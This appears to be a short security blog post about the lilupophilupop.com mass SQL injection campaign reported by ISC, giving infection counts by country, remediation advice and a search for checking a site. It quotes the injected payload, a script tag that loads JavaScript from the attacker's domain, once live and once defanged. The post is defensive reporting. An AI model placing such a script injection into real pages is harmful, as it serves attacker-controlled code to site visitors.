Last year(Yes it is last year) on Dec 1st , ISC reported about the lilupophilupop.com SQL injection attack (combined with XSS technique). When they report for first time, the number of infected pages is 80. later in the middle of the month, it raise to 160,000 . At the end of the month(Now), The infected page list crossed one million.
These sites are infected by injecting the following script :
"></title><script src="http://lilupophilupop.com/sl.php"></script>
According to their report, the infected domain are from:
- NL - 123,000
- FR - 68,100
- UK - 56,300
- DE - 49,700
- RU - 32,000
- DK - 31,000
- COM - 30,500
- JP - 23,200
- CA - 16,600
- ORG - 2,690
- CN - 505
After researching the log records of the infected sites, the attackers try to attack the vulnerable sites daily from different IP address.
"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.
When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept. " Said in the First report.
Check Your Sites Infected by these Attack:
If you want to make sure, your site is infected by the attack, then search in google as:"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com
replace the "your_site.com" with your site url.
